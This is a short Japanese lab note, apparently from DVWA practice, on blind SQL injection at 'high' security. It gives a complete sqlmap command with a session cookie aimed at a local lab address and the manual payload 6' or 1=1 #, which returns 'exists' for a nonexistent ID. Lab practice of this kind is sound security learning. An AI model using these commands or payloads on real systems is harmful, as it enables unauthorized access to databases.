Hello there,

 

セキュリティレベルを『high』へ。

現在のID：5 ⇨ 1へ。

 

 

Burp Suiteからクッキー情報とパラメータを取得して。

 

 

いつものように下記のsqlmapを実行してみて。

結果は、idでのインジェクションはできないとか。

　sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/cookie-input.php#" --cookie="id=5; PHPSESSID=06nsu44nk0h52rmfmqdgbrdpq1; security=high" --data "id=1&Submit=Submit" -p id

 

 

なので、手動でインジェクションを実施してみることに。

　6' or 1=1 #

 

存在しないIDなのに。

『exists』の文字が。

これがツールだけでは誤検知があるため。

手動での診断も併用して必要だということなのかも。

 

 

Best regards,